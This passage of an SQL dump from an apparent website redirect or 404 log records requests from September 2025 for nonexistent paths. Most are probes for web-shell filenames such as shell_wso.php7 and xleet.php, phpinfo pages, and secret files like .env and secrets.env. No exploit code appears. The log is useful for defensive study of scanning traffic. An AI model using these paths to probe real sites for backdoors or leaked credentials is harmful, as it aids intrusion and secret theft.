00:00:00',301),(46472,'http://3s-technologies.com.tr/tr/data532.php',NULL,'','',1,0,'2025-09-06 20:39:12','0000-00-00 00:00:00',301),(46473,'http://3s-technologies.com.tr/tr/helper043.php',NULL,'','',1,0,'2025-09-06 20:39:13','0000-00-00 00:00:00',301),(46474,'http://3s-technologies.com.tr/tr/core885.php',NULL,'','',1,0,'2025-09-06 20:39:13','0000-00-00 00:00:00',301),(46475,'http://3s-technologies.com.tr/tr/hugo.php',NULL,'','',4,0,'2025-09-06 20:39:20','0000-00-00 00:00:00',301),(46476,'http://3s-technologies.com.tr/tr/sa.php7',NULL,'','',19,0,'2025-09-06 20:39:36','0000-00-00 00:00:00',301),(46477,'http://3s-technologies.com.tr/tr/shell_wso.php7',NULL,'','',3,0,'2025-09-06 20:39:37','0000-00-00 00:00:00',301),(46478,'http://3s-technologies.com.tr/tr/ee8.php',NULL,'','',4,0,'2025-09-06 20:39:41','0000-00-00 00:00:00',301),(46479,'http://3s-technologies.com.tr/tr/too.php',NULL,'','',3,0,'2025-09-06 20:39:46','0000-00-00 00:00:00',301),(46480,'https://www.3s-technologies.com.tr/tr/images/4nooa4ej/production/a7d739b2c14f6b8bf3e7c76e1907929a446d613d-1920x1080.svg',NULL,'https://www.3s-technologies.com.tr/images/4nooa4ej/production/a7d739b2c14f6b8bf3e7c76e1907929a446d613d-1920x1080.svg','',4,0,'2025-09-06 21:17:42','0000-00-00 00:00:00',301),(46481,'http://www.3s-technologies.com.tr/en/pcb-productions-methods\n',NULL,'','',1,0,'2025-09-06 22:36:57','0000-00-00 00:00:00',301),(46482,'https://www.3s-technologies.com.tr/tr/wood-processing-ahşap-işleme\n',NULL,'','',1,0,'2025-09-07 02:26:56','0000-00-00 00:00:00',301),(46483,'https://3s-technologies.com.tr/tr/assets/images/accesson.php',NULL,'','',3,0,'2025-09-07 08:06:16','0000-00-00 00:00:00',301),(46484,'https://3s-technologies.com.tr/tr/bitrix/admin/accesson.php',NULL,'','',3,0,'2025-09-07 08:06:17','0000-00-00 00:00:00',301),(46485,'https://3s-technologies.com.tr/tr/assets/accesson.php',NULL,'','',3,0,'2025-09-07 08:06:17','0000-00-00 00:00:00',301),(46486,'http://3s-technologies.com.tr/tr/mr.php',NULL,'','',6,0,'2025-09-07 13:30:55','0000-00-00 00:00:00',301),(46487,'http://3s-technologies.com.tr/tr/ioxi2.php',NULL,'','',23,0,'2025-09-07 13:30:59','0000-00-00 00:00:00',301),(46488,'http://3s-technologies.com.tr/tr/zcxb.php',NULL,'','',6,0,'2025-09-07 13:31:02','0000-00-00 00:00:00',301),(46489,'http://3s-technologies.com.tr/tr/wpls.php',NULL,'','',22,0,'2025-09-07 13:31:02','0000-00-00 00:00:00',301),(46490,'http://3s-technologies.com.tr/tr/testas.php',NULL,'','',6,0,'2025-09-07 13:31:02','0000-00-00 00:00:00',301),(46491,'http://3s-technologies.com.tr/tr/reyna.php',NULL,'','',13,0,'2025-09-07 13:31:03','0000-00-00 00:00:00',301),(46492,'http://3s-technologies.com.tr/tr/ma1.php',NULL,'','',7,0,'2025-09-07 13:31:04','0000-00-00 00:00:00',301),(46493,'http://3s-technologies.com.tr/tr/bypltspd.php',NULL,'','',14,0,'2025-09-07 13:31:04','0000-00-00 00:00:00',301),(46494,'http://3s-technologies.com.tr/tr/wp-xx.php',NULL,'','',8,0,'2025-09-07 13:31:06','0000-00-00 00:00:00',301),(46495,'http://3s-technologies.com.tr/tr/wp-xm.php',NULL,'','',8,0,'2025-09-07 13:31:06','0000-00-00 00:00:00',301),(46496,'http://3s-technologies.com.tr/tr/zeal.php',NULL,'','',25,0,'2025-09-07 13:31:07','0000-00-00 00:00:00',301),(46497,'http://3s-technologies.com.tr/tr/h8h9.php',NULL,'','',6,0,'2025-09-07 13:31:07','0000-00-00 00:00:00',301),(46498,'http://3s-technologies.com.tr/tr/zasd.php',NULL,'','',6,0,'2025-09-07 13:31:08','0000-00-00 00:00:00',301),(46499,'http://3s-technologies.com.tr/tr/xzs.php',NULL,'','',6,0,'2025-09-07 13:31:08','0000-00-00 00:00:00',301),(46500,'http://3s-technologies.com.tr/tr/yep.php',NULL,'','',7,0,'2025-09-07 13:31:09','0000-00-00 00:00:00',301),(46501,'http://3s-technologies.com.tr/tr/des.php',NULL,'','',50,0,'2025-09-07 13:31:09','0000-00-00 00:00:00',301),(46502,'http://3s-technologies.com.tr/tr/tox.php',NULL,'','',26,0,'2025-09-07 13:31:10','0000-00-00 00:00:00',301),(46503,'http://3s-technologies.com.tr/tr/racs3.php',NULL,'','',19,0,'2025-09-07 13:31:11','0000-00-00 00:00:00',301),(46504,'http://3s-technologies.com.tr/tr/wp-cliner.php',NULL,'','',8,0,'2025-09-07 13:31:11','0000-00-00 00:00:00',301),(46505,'http://3s-technologies.com.tr/tr/moo.php',NULL,'','',7,0,'2025-09-07 13:31:13','0000-00-00 00:00:00',301),(46506,'http://3s-technologies.com.tr/tr/noe.php',NULL,'','',8,0,'2025-09-07 13:31:14','0000-00-00 00:00:00',301),(46507,'http://3s-technologies.com.tr/tr/fe5.php',NULL,'','',110,0,'2025-09-07 13:31:15','0000-00-00 00:00:00',301),(46508,'http://3s-technologies.com.tr/tr/fresh3.php',NULL,'','',11,0,'2025-09-07 13:31:16','0000-00-00 00:00:00',301),(46509,'http://3s-technologies.com.tr/tr/mo.php',NULL,'','',16,0,'2025-09-07 13:31:16','0000-00-00 00:00:00',301),(46510,'http://3s-technologies.com.tr/tr/pkm.php',NULL,'','',2,0,'2025-09-07 13:32:14','0000-00-00 00:00:00',301),(46511,'http://3s-technologies.com.tr/tr/qil.php',NULL,'','',2,0,'2025-09-07 13:32:14','0000-00-00 00:00:00',301),(46512,'http://3s-technologies.com.tr/tr/rjv.php',NULL,'','',4,0,'2025-09-07 13:32:15','0000-00-00 00:00:00',301),(46513,'http://3s-technologies.com.tr/tr/bizyqph.php',NULL,'','',1,0,'2025-09-07 13:32:16','0000-00-00 00:00:00',301),(46514,'http://3s-technologies.com.tr/tr/ronjgvf.php',NULL,'','',1,0,'2025-09-07 13:32:16','0000-00-00 00:00:00',301),(46515,'http://3s-technologies.com.tr/tr/tech5pr.php',NULL,'','',2,0,'2025-09-07 13:32:17','0000-00-00 00:00:00',301),(46516,'http://3s-technologies.com.tr/tr/ledlight.php',NULL,'','',1,0,'2025-09-07 13:32:17','0000-00-00 00:00:00',301),(46517,'http://3s-technologies.com.tr/tr/foot.php',NULL,'','',2,0,'2025-09-07 13:32:18','0000-00-00 00:00:00',301),(46518,'http://3s-technologies.com.tr/tr/goup.php',NULL,'','',1,0,'2025-09-07 13:32:18','0000-00-00 00:00:00',301),(46519,'http://3s-technologies.com.tr/tr/wp-cont.php',NULL,'','',1,0,'2025-09-07 13:32:18','0000-00-00 00:00:00',301),(46520,'http://3s-technologies.com.tr/tr/sarang.php',NULL,'','',3,0,'2025-09-07 13:32:19','0000-00-00 00:00:00',301),(46521,'http://3s-technologies.com.tr/tr/bq.php',NULL,'','',1,0,'2025-09-07 13:32:20','0000-00-00 00:00:00',301),(46522,'http://3s-technologies.com.tr/tr/ov.php',NULL,'','',9,0,'2025-09-07 13:32:20','0000-00-00 00:00:00',301),(46523,'http://3s-technologies.com.tr/tr/ova-simple.php',NULL,'','',10,0,'2025-09-07 13:32:21','0000-00-00 00:00:00',301),(46524,'http://3s-technologies.com.tr/tr/xjeuhhoaut.php',NULL,'','',1,0,'2025-09-07 13:32:22','0000-00-00 00:00:00',301),(46525,'http://3s-technologies.com.tr/tr/bu10r7.php',NULL,'','',1,0,'2025-09-07 13:32:23','0000-00-00 00:00:00',301),(46526,'http://3s-technologies.com.tr/tr/huda.php',NULL,'','',1,0,'2025-09-07 13:32:24','0000-00-00 00:00:00',301),(46527,'http://3s-technologies.com.tr/tr/hkn.php',NULL,'','',1,0,'2025-09-07 13:32:24','0000-00-00 00:00:00',301),(46528,'http://3s-technologies.com.tr/tr/sdsd777.php',NULL,'','',1,0,'2025-09-07 13:32:25','0000-00-00 00:00:00',301),(46529,'http://mail.3s-technologies.com.tr/tr/pages.php',NULL,'','',6,0,'2025-09-07 20:35:01','0000-00-00 00:00:00',301),(46530,'http://mail.3s-technologies.com.tr/tr/nxac.php',NULL,'','',2,0,'2025-09-07 20:35:02','0000-00-00 00:00:00',301),(46531,'http://mail.3s-technologies.com.tr/tr/cache.php',NULL,'','',19,0,'2025-09-07 20:35:03','0000-00-00 00:00:00',301),(46532,'http://mail.3s-technologies.com.tr/tr/lock.php',NULL,'','',22,0,'2025-09-07 20:35:04','0000-00-00 00:00:00',301),(46533,'http://mail.3s-technologies.com.tr/tr/lufix.php',NULL,'','',14,0,'2025-09-07 20:35:05','0000-00-00 00:00:00',301),(46534,'http://mail.3s-technologies.com.tr/tr/sxo.php',NULL,'','',7,0,'2025-09-07 20:35:06','0000-00-00 00:00:00',301),(46535,'http://mail.3s-technologies.com.tr/tr/njima.php',NULL,'','',2,0,'2025-09-07 20:35:08','0000-00-00 00:00:00',301),(46536,'http://mail.3s-technologies.com.tr/tr/baxa1.php8',NULL,'','',5,0,'2025-09-07 20:35:09','0000-00-00 00:00:00',301),(46537,'http://mail.3s-technologies.com.tr/tr/user.php',NULL,'','',28,0,'2025-09-07 20:35:10','0000-00-00 00:00:00',301),(46538,'http://mail.3s-technologies.com.tr/tr/themes.php',NULL,'','',75,0,'2025-09-07 20:35:11','0000-00-00 00:00:00',301),(46539,'http://mail.3s-technologies.com.tr/tr/doc.php',NULL,'','',51,0,'2025-09-07 20:35:13','0000-00-00 00:00:00',301),(46540,'http://mail.3s-technologies.com.tr/tr/bibil.php',NULL,'','',18,0,'2025-09-07 20:35:13','0000-00-00 00:00:00',301),(46541,'http://mail.3s-technologies.com.tr/tr/ws.php',NULL,'','',35,0,'2025-09-07 20:35:14','0000-00-00 00:00:00',301),(46542,'http://mail.3s-technologies.com.tr/tr/xleet.php',NULL,'','',6,0,'2025-09-07 20:35:15','0000-00-00 00:00:00',301),(46543,'http://mail.3s-technologies.com.tr/tr/dropdown.php',NULL,'','',35,0,'2025-09-07 20:35:16','0000-00-00 00:00:00',301),(46544,'http://mail.3s-technologies.com.tr/tr/sts.php',NULL,'','',7,0,'2025-09-07 20:35:18','0000-00-00 00:00:00',301),(46545,'http://mail.3s-technologies.com.tr/tr/1337.php',NULL,'','',7,0,'2025-09-07 20:35:22','0000-00-00 00:00:00',301),(46546,'http://mail.3s-technologies.com.tr/tr/w.php',NULL,'','',48,0,'2025-09-07 20:35:23','0000-00-00 00:00:00',301),(46547,'http://mail.3s-technologies.com.tr/tr/test.php',NULL,'','',23,0,'2025-09-07 20:35:25','0000-00-00 00:00:00',301),(46548,'http://mail.3s-technologies.com.tr/tr/cong.php',NULL,'','',62,0,'2025-09-07 20:35:26','0000-00-00 00:00:00',301),(46549,'http://mail.3s-technologies.com.tr/tr/k.php',NULL,'','',61,0,'2025-09-07 20:35:27','0000-00-00 00:00:00',301),(46550,'http://mail.3s-technologies.com.tr/tr/web.php',NULL,'','',12,0,'2025-09-07 20:35:28','0000-00-00 00:00:00',301),(46551,'http://mail.3s-technologies.com.tr/tr/byp.php',NULL,'','',53,0,'2025-09-07 20:35:28','0000-00-00 00:00:00',301),(46552,'http://mail.3s-technologies.com.tr/tr/fox.php',NULL,'','',5,0,'2025-09-07 20:35:29','0000-00-00 00:00:00',301),(46553,'http://mail.3s-technologies.com.tr/tr/baxa1.php7',NULL,'','',2,0,'2025-09-07 20:35:31','0000-00-00 00:00:00',301),(46554,'http://mail.3s-technologies.com.tr/tr/json.php',NULL,'','',2,0,'2025-09-07 20:35:32','0000-00-00 00:00:00',301),(46555,'http://mail.3s-technologies.com.tr/tr/shh.php',NULL,'','',1,0,'2025-09-07 20:35:32','0000-00-00 00:00:00',301),(46556,'http://mail.3s-technologies.com.tr/tr/oga.php',NULL,'','',2,0,'2025-09-07 20:35:33','0000-00-00 00:00:00',301),(46557,'http://mail.3s-technologies.com.tr/tr/nng.phpp',NULL,'','',1,0,'2025-09-07 20:35:34','0000-00-00 00:00:00',301),(46558,'http://mail.3s-technologies.com.tr/tr/sxp.php',NULL,'','',1,0,'2025-09-07 20:35:36','0000-00-00 00:00:00',301),(46559,'http://mail.3s-technologies.com.tr/tr/ps.php',NULL,'','',5,0,'2025-09-07 20:35:38','0000-00-00 00:00:00',301),(46560,'http://3s-technologies.com.tr/tr/golden.php',NULL,'','',5,0,'2025-09-07 22:53:55','0000-00-00 00:00:00',301),(46561,'http://3s-technologies.com.tr/tr/xmlrpcx.php',NULL,'','',2,0,'2025-09-07 22:54:13','0000-00-00 00:00:00',301),(46562,'http://3s-technologies.com.tr/tr/xleetx.php',NULL,'','',3,0,'2025-09-07 22:54:35','0000-00-00 00:00:00',301),(46563,'http://3s-technologies.com.tr/tr/xax.php',NULL,'','',2,0,'2025-09-07 22:54:40','0000-00-00 00:00:00',301),(46564,'http://3s-technologies.com.tr/tr/wp/pomo/pomo.php',NULL,'','',2,0,'2025-09-08 06:09:39','0000-00-00 00:00:00',301),(46565,'http://3s-technologies.com.tr/tr/egaiska.ru/doc.php',NULL,'','',2,0,'2025-09-08 06:09:49','0000-00-00 00:00:00',301),(46566,'http://3s-technologies.com.tr/tr/wp-',NULL,'','',7,0,'2025-09-08 06:56:03','0000-00-00 00:00:00',301),(46567,'http://3s-technologies.com.tr/tr/wp-content/plugins/wordpresscore/cong.php',NULL,'','',7,0,'2025-09-08 06:57:02','0000-00-00 00:00:00',301),(46568,'http://3s-technologies.com.tr/tr/tx99gtdsbbfr.php',NULL,'','',1,0,'2025-09-08 09:49:59','0000-00-00 00:00:00',301),(46569,'http://3s-technologies.com.tr/tr/aa8.php',NULL,'','',5,0,'2025-09-08 09:50:00','0000-00-00 00:00:00',301),(46570,'http://3s-technologies.com.tr/tr/nxx.php',NULL,'','',4,0,'2025-09-08 09:50:01','0000-00-00 00:00:00',301),(46571,'http://3s-technologies.com.tr/tr/claa.php',NULL,'','',10,0,'2025-09-08 09:50:02','0000-00-00 00:00:00',301),(46572,'http://3s-technologies.com.tr/tr/zc.php',NULL,'','',3,0,'2025-09-08 09:50:03','0000-00-00 00:00:00',301),(46573,'http://3s-technologies.com.tr/tr/xojryvch.php',NULL,'','',3,0,'2025-09-08 09:50:04','0000-00-00 00:00:00',301),(46574,'http://mail.3s-technologies.com.tr/tr/mr.php',NULL,'','',2,0,'2025-09-08 14:37:22','0000-00-00 00:00:00',301),(46575,'http://mail.3s-technologies.com.tr/tr/wp-xrm.php',NULL,'','',3,0,'2025-09-08 14:38:37','0000-00-00 00:00:00',301),(46576,'http://mail.3s-technologies.com.tr/tr/r4f_1.php',NULL,'','',12,0,'2025-09-08 14:38:38','0000-00-00 00:00:00',301),(46577,'http://mail.3s-technologies.com.tr/tr/nbm.php',NULL,'','',3,0,'2025-09-08 14:38:38','0000-00-00 00:00:00',301),(46578,'http://mail.3s-technologies.com.tr/tr/ff.php',NULL,'','',13,0,'2025-09-08 14:38:39','0000-00-00 00:00:00',301),(46579,'http://mail.3s-technologies.com.tr/tr/mws.php',NULL,'','',8,0,'2025-09-08 14:38:40','0000-00-00 00:00:00',301),(46580,'http://mail.3s-technologies.com.tr/tr/alf4.php',NULL,'','',3,0,'2025-09-08 14:38:41','0000-00-00 00:00:00',301),(46581,'http://mail.3s-technologies.com.tr/tr/mtrje.php',NULL,'','',3,0,'2025-09-08 14:38:42','0000-00-00 00:00:00',301),(46582,'http://mail.3s-technologies.com.tr/tr/shell1.php',NULL,'','',13,0,'2025-09-08 14:38:43','0000-00-00 00:00:00',301),(46583,'http://mail.3s-technologies.com.tr/tr/chn.php',NULL,'','',3,0,'2025-09-08 14:38:43','0000-00-00 00:00:00',301),(46584,'http://mail.3s-technologies.com.tr/tr/mnkalo.php',NULL,'','',8,0,'2025-09-08 14:38:44','0000-00-00 00:00:00',301),(46585,'http://mail.3s-technologies.com.tr/tr/abt.php',NULL,'','',8,0,'2025-09-08 14:38:46','0000-00-00 00:00:00',301),(46586,'http://mail.3s-technologies.com.tr/tr/awi.php',NULL,'','',3,0,'2025-09-08 14:38:47','0000-00-00 00:00:00',301),(46587,'http://mail.3s-technologies.com.tr/tr/malo.php',NULL,'','',3,0,'2025-09-08 14:38:47','0000-00-00 00:00:00',301),(46588,'http://mail.3s-technologies.com.tr/tr/upgrade.php',NULL,'','',4,0,'2025-09-08 14:38:48','0000-00-00 00:00:00',301),(46589,'http://mail.3s-technologies.com.tr/tr/10266.php',NULL,'','',3,0,'2025-09-08 14:38:49','0000-00-00 00:00:00',301),(46590,'http://mail.3s-technologies.com.tr/tr/xpass.php',NULL,'','',8,0,'2025-09-08 14:38:50','0000-00-00 00:00:00',301),(46591,'http://mail.3s-technologies.com.tr/tr/hg.php',NULL,'','',4,0,'2025-09-08 14:38:50','0000-00-00 00:00:00',301),(46592,'http://mail.3s-technologies.com.tr/tr/async.php',NULL,'','',5,0,'2025-09-08 14:38:51','0000-00-00 00:00:00',301),(46593,'http://mail.3s-technologies.com.tr/tr/class.1.php',NULL,'','',13,0,'2025-09-08 14:38:52','0000-00-00 00:00:00',301),(46594,'http://mail.3s-technologies.com.tr/tr/gfile1.php',NULL,'','',6,0,'2025-09-08 14:38:53','0000-00-00 00:00:00',301),(46595,'http://mail.3s-technologies.com.tr/tr/whv.php',NULL,'','',2,0,'2025-09-08 14:38:54','0000-00-00 00:00:00',301),(46596,'http://mail.3s-technologies.com.tr/tr/ioxi-o.php',NULL,'','',108,0,'2025-09-08 14:38:55','0000-00-00 00:00:00',301),(46597,'http://mail.3s-technologies.com.tr/tr/volka.php',NULL,'','',2,0,'2025-09-08 14:38:57','0000-00-00 00:00:00',301),(46598,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/lwbdene/index.php',NULL,'','',2,0,'2025-09-08 16:44:05','0000-00-00 00:00:00',301),(46599,'http://mail.3s-technologies.com.tr/tr/z.php',NULL,'','',34,0,'2025-09-08 16:44:21','0000-00-00 00:00:00',301),(46600,'http://mail.3s-technologies.com.tr/tr/wsr2.php',NULL,'','',3,0,'2025-09-08 16:44:22','0000-00-00 00:00:00',301),(46601,'http://mail.3s-technologies.com.tr/tr/xpas2.php',NULL,'','',1,0,'2025-09-08 16:44:32','0000-00-00 00:00:00',301),(46602,'http://mail.3s-technologies.com.tr/tr/bv3.php',NULL,'','',1,0,'2025-09-08 16:44:32','0000-00-00 00:00:00',301),(46603,'http://3s-technologies.com.tr/tr/wp-xrm.php',NULL,'','',4,0,'2025-09-08 18:05:56','0000-00-00 00:00:00',301),(46604,'http://3s-technologies.com.tr/tr/r4f_1.php',NULL,'','',13,0,'2025-09-08 18:05:57','0000-00-00 00:00:00',301),(46605,'http://3s-technologies.com.tr/tr/nbm.php',NULL,'','',3,0,'2025-09-08 18:05:58','0000-00-00 00:00:00',301),(46606,'http://3s-technologies.com.tr/tr/mtrje.php',NULL,'','',3,0,'2025-09-08 18:06:01','0000-00-00 00:00:00',301),(46607,'http://3s-technologies.com.tr/tr/shell1.php',NULL,'','',23,0,'2025-09-08 18:06:02','0000-00-00 00:00:00',301),(46608,'http://3s-technologies.com.tr/tr/chn.php',NULL,'','',3,0,'2025-09-08 18:06:02','0000-00-00 00:00:00',301),(46609,'http://3s-technologies.com.tr/tr/mnkalo.php',NULL,'','',5,0,'2025-09-08 18:06:03','0000-00-00 00:00:00',301),(46610,'http://3s-technologies.com.tr/tr/abt.php',NULL,'','',9,0,'2025-09-08 18:06:05','0000-00-00 00:00:00',301),(46611,'http://3s-technologies.com.tr/tr/awi.php',NULL,'','',3,0,'2025-09-08 18:06:06','0000-00-00 00:00:00',301),(46612,'http://3s-technologies.com.tr/tr/malo.php',NULL,'','',3,0,'2025-09-08 18:06:07','0000-00-00 00:00:00',301),(46613,'http://3s-technologies.com.tr/tr/10266.php',NULL,'','',3,0,'2025-09-08 18:06:08','0000-00-00 00:00:00',301),(46614,'http://3s-technologies.com.tr/tr/xpass.php',NULL,'','',11,0,'2025-09-08 18:06:09','0000-00-00 00:00:00',301),(46615,'http://3s-technologies.com.tr/tr/hg.php',NULL,'','',8,0,'2025-09-08 18:06:10','0000-00-00 00:00:00',301),(46616,'http://3s-technologies.com.tr/tr/async.php',NULL,'','',11,0,'2025-09-08 18:06:11','0000-00-00 00:00:00',301),(46617,'http://3s-technologies.com.tr/tr/class.1.php',NULL,'','',39,0,'2025-09-08 18:06:11','0000-00-00 00:00:00',301),(46618,'http://3s-technologies.com.tr/tr/gfile1.php',NULL,'','',14,0,'2025-09-08 18:06:12','0000-00-00 00:00:00',301),(46619,'http://3s-technologies.com.tr/tr/whv.php',NULL,'','',3,0,'2025-09-08 18:06:13','0000-00-00 00:00:00',301),(46620,'http://3s-technologies.com.tr/tr/volka.php',NULL,'','',3,0,'2025-09-08 18:06:16','0000-00-00 00:00:00',301),(46621,'http://3s-technologies.com.tr/tr/cgi-bin/wp-2019.php',NULL,'','',2,0,'2025-09-08 18:15:49','0000-00-00 00:00:00',301),(46622,'http://3s-technologies.com.tr/tr/classwithtostring.phpl',NULL,'','',2,0,'2025-09-08 18:39:55','0000-00-00 00:00:00',301),(46623,'https://3s-technologies.com.tr/tr/ana-sayfa\n',NULL,'','',1,0,'2025-09-09 00:18:24','0000-00-00 00:00:00',301),(46624,'https://3s-technologies.com.tr/tr/video\n',NULL,'','',2,0,'2025-09-09 01:10:22','0000-00-00 00:00:00',301),(46625,'http://www.3s-technologies.com.tr/en/videos\n',NULL,'','',2,0,'2025-09-09 02:07:10','0000-00-00 00:00:00',301),(46626,'http://3s-technologies.com.tr/tr/hexx.php',NULL,'','',21,0,'2025-09-09 11:39:48','0000-00-00 00:00:00',301),(46627,'http://3s-technologies.com.tr/tr/efile.php',NULL,'','',34,0,'2025-09-09 11:39:50','0000-00-00 00:00:00',301),(46628,'http://3s-technologies.com.tr/tr/va.php',NULL,'','',1,0,'2025-09-09 11:39:51','0000-00-00 00:00:00',301),(46629,'http://3s-technologies.com.tr/tr/fork.php',NULL,'','',1,0,'2025-09-09 11:39:52','0000-00-00 00:00:00',301),(46630,'http://3s-technologies.com.tr/tr/abhgt.php',NULL,'','',1,0,'2025-09-09 11:39:54','0000-00-00 00:00:00',301),(46631,'http://3s-technologies.com.tr/tr/wp-omo.php',NULL,'','',1,0,'2025-09-09 11:39:55','0000-00-00 00:00:00',301),(46632,'http://3s-technologies.com.tr/tr/hook.php',NULL,'','',18,0,'2025-09-09 11:39:56','0000-00-00 00:00:00',301),(46633,'http://3s-technologies.com.tr/tr/old____tesla.php',NULL,'','',1,0,'2025-09-09 11:39:58','0000-00-00 00:00:00',301),(46634,'http://3s-technologies.com.tr/tr/tund.php',NULL,'','',1,0,'2025-09-09 11:40:02','0000-00-00 00:00:00',301),(46635,'https://www.3s-technologies.com.tr/tr/tool/view/phpinfo.view.php',NULL,'','',1,0,'2025-09-09 15:42:05','0000-00-00 00:00:00',301),(46636,'https://www.3s-technologies.com.tr/tr/test.php',NULL,'','',4,0,'2025-09-09 15:42:06','0000-00-00 00:00:00',301),(46637,'https://www.3s-technologies.com.tr/tr/phpinfo=1',NULL,'','',1,0,'2025-09-09 15:42:08','0000-00-00 00:00:00',301),(46638,'https://3s-technologies.com.tr/tr/.config.yaml',NULL,'','',1,0,'2025-09-09 17:55:24','0000-00-00 00:00:00',301),(46639,'https://3s-technologies.com.tr/tr/secrets.env',NULL,'','',2,0,'2025-09-09 17:55:29','0000-00-00 00:00:00',301),(46640,'https://3s-technologies.com.tr/tr/web/.env',NULL,'','',12,0,'2025-09-09 17:55:33','0000-00-00 00:00:00',301),(46641,'https://3s-technologies.com.tr/tr/.env.bak',NULL,'','',31,0,'2025-09-09 17:55:35','0000-00-00 00:00:00',301),(46642,'http://3s-technologies.com.tr/tr/jlex.php',NULL,'','',43,0,'2025-09-09 18:36:26','0000-00-00 00:00:00',301),(46643,'http://3s-technologies.com.tr/tr/ki1k.php',NULL,'','',5,0,'2025-09-09 18:38:02','0000-00-00 00:00:00',301),(46644,'http://3s-technologies.com.tr/tr/business.php',NULL,'','',1,0,'2025-09-09 18:38:10','0000-00-00 00:00:00',301),(46645,'http://3s-technologies.com.tr/tr/unesco.php',NULL,'','',1,0,'2025-09-09 18:38:11','0000-00-00 00:00:00',301),(46646,'http://3s-technologies.com.tr/tr/global.php',NULL,'','',16,0,'2025-09-09 18:38:12','0000-00-00 00:00:00',301),(46647,'http://3s-technologies.com.tr/tr/expo.php',NULL,'','',1,0,'2025-09-09 18:38:13','0000-00-00 00:00:00',301),(46648,'http://3s-technologies.com.tr/tr/members.php',NULL,'','',10,0,'2025-09-09 18:38:14','0000-00-00 00:00:00',301),(46649,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/akrilik-işleme-acrylic-processing\n',NULL,'','',1,0,'2025-09-09 19:45:26','0000-00-00 00:00:00',301),(46650,'https://3s-technologies.com.tr/tr/wood-processing-ahşap-işleme\n',NULL,'','',2,0,'2025-09-09 21:03:07','0000-00-00 00:00:00',301),(46651,'http://mail.3s-technologies.com.tr/tr/sec.php',NULL,'','',15,0,'2025-09-10 01:56:07','0000-00-00 00:00:00',301),(46652,'http://mail.3s-technologies.com.tr/tr/new7.php',NULL,'','',1,0,'2025-09-10 01:56:10','0000-00-00 00:00:00',301),(46653,'http://mail.3s-technologies.com.tr/tr/new14.php',NULL,'','',1,0,'2025-09-10 01:56:10','0000-00-00 00:00:00',301),(46654,'http://mail.3s-technologies.com.tr/tr/new17.php',NULL,'','',1,0,'2025-09-10 01:56:11','0000-00-00 00:00:00',301),(46655,'http://mail.3s-technologies.com.tr/tr/class.php',NULL,'','',59,0,'2025-09-10 01:56:12','0000-00-00 00:00:00',301),(46656,'http://mail.3s-technologies.com.tr/tr/class7.php',NULL,'','',1,0,'2025-09-10 01:56:12','0000-00-00 00:00:00',301),(46657,'http://mail.3s-technologies.com.tr/tr/file14.php',NULL,'','',2,0,'2025-09-10 01:56:14','0000-00-00 00:00:00',301),(46658,'https://mail.3s-technologies.com.tr/tr/api/.env',NULL,'','',1,0,'2025-09-10 06:45:51','0000-00-00 00:00:00',301),(46659,'https://mail.3s-technologies.com.tr/tr/config/.env',NULL,'','',1,0,'2025-09-10 06:45:52','0000-00-00 00:00:00',301),(46660,'https://mail.3s-technologies.com.tr/tr/_profiler/phpinfo',NULL,'','',1,0,'2025-09-10 06:45:53','0000-00-00 00:00:00',301),(46661,'https://mail.3s-technologies.com.tr/tr/tool/view/phpinfo.view.php',NULL,'','',1,0,'2025-09-10 06:45:54','0000-00-00 00:00:00',301),(46662,'https://mail.3s-technologies.com.tr/tr/test.php',NULL,'','',4,0,'2025-09-10 06:45:55','0000-00-00 00:00:00',301),(46663,'https://mail.3s-technologies.com.tr/tr/app_dev.php/_profiler/phpinfo',NULL,'','',1,0,'2025-09-10 06:45:55','0000-00-00 00:00:00',301),(46664,'https://mail.3s-technologies.com.tr/tr/phpinfo=1',NULL,'','',1,0,'2025-09-10 06:45:56','0000-00-00 00:00:00',301),(46665,'https://mail.3s-technologies.com.tr/tr/phpinfo.php',NULL,'','',4,0,'2025-09-10 06:45:57','0000-00-00 00:00:00',301),(46666,'https://mail.3s-technologies.com.tr/tr/phpinfo',NULL,'','',1,0,'2025-09-10 06:45:58','0000-00-00 00:00:00',301),(46667,'https://mail.3s-technologies.com.tr/tr/info.php',NULL,'','',4,0,'2025-09-10 06:45:59','0000-00-00 00:00:00',301),(46668,'http://mail.3s-technologies.com.tr/tr/tesla.php',NULL,'','',1,0,'2025-09-10 17:05:53','0000-00-00 00:00:00',301),(46669,'http://mail.3s-technologies.com.tr/tr/hexx.php',NULL,'','',7,0,'2025-09-10 17:05:54','0000-00-00 00:00:00',301),(46670,'http://mail.3s-technologies.com.tr/tr/wp-kisaki.php',NULL,'','',1,0,'2025-09-10 17:05:56','0000-00-00 00:00:00',301),(46671,'http://mail.3s-technologies.com.tr/tr/cra.php',NULL,'','',1,0,'2025-09-10 17:05:57','0000-00-00 00:00:00',301),(46672,'http://mail.3s-technologies.com.tr/tr/usep.php',NULL,'','',20,0,'2025-09-10 17:05:57','0000-00-00 00:00:00',301),(46673,'http://mail.3s-technologies.com.tr/tr/xbrain.php',NULL,'','',1,0,'2025-09-10 17:05:58','0000-00-00 00:00:00',301),(46674,'http://mail.3s-technologies.com.tr/tr/documentroot.php',NULL,'','',1,0,'2025-09-10 17:05:59','0000-00-00 00:00:00',301),(46675,'http://mail.3s-technologies.com.tr/tr/puts.php',NULL,'','',1,0,'2025-09-10 17:06:00','0000-00-00 00:00:00',301),(46676,'http://mail.3s-technologies.com.tr/tr/lala.php',NULL,'','',36,0,'2025-09-10 17:06:01','0000-00-00 00:00:00',301),(46677,'http://mail.3s-technologies.com.tr/tr/blue.php',NULL,'','',2,0,'2025-09-10 17:06:01','0000-00-00 00:00:00',301),(46678,'http://mail.3s-technologies.com.tr/tr/cccc.php',NULL,'','',17,0,'2025-09-10 17:06:02','0000-00-00 00:00:00',301),(46679,'http://mail.3s-technologies.com.tr/tr/eauu.php',NULL,'','',14,0,'2025-09-10 17:06:03','0000-00-00 00:00:00',301),(46680,'http://mail.3s-technologies.com.tr/tr/file1.php',NULL,'','',29,0,'2025-09-10 17:06:04','0000-00-00 00:00:00',301),(46681,'http://mail.3s-technologies.com.tr/tr/zex4.php',NULL,'','',1,0,'2025-09-10 17:06:04','0000-00-00 00:00:00',301),(46682,'http://mail.3s-technologies.com.tr/tr/x3x3x3x.php',NULL,'','',1,0,'2025-09-10 17:06:05','0000-00-00 00:00:00',301),(46683,'http://mail.3s-technologies.com.tr/tr/efile.php',NULL,'','',16,0,'2025-09-10 17:06:07','0000-00-00 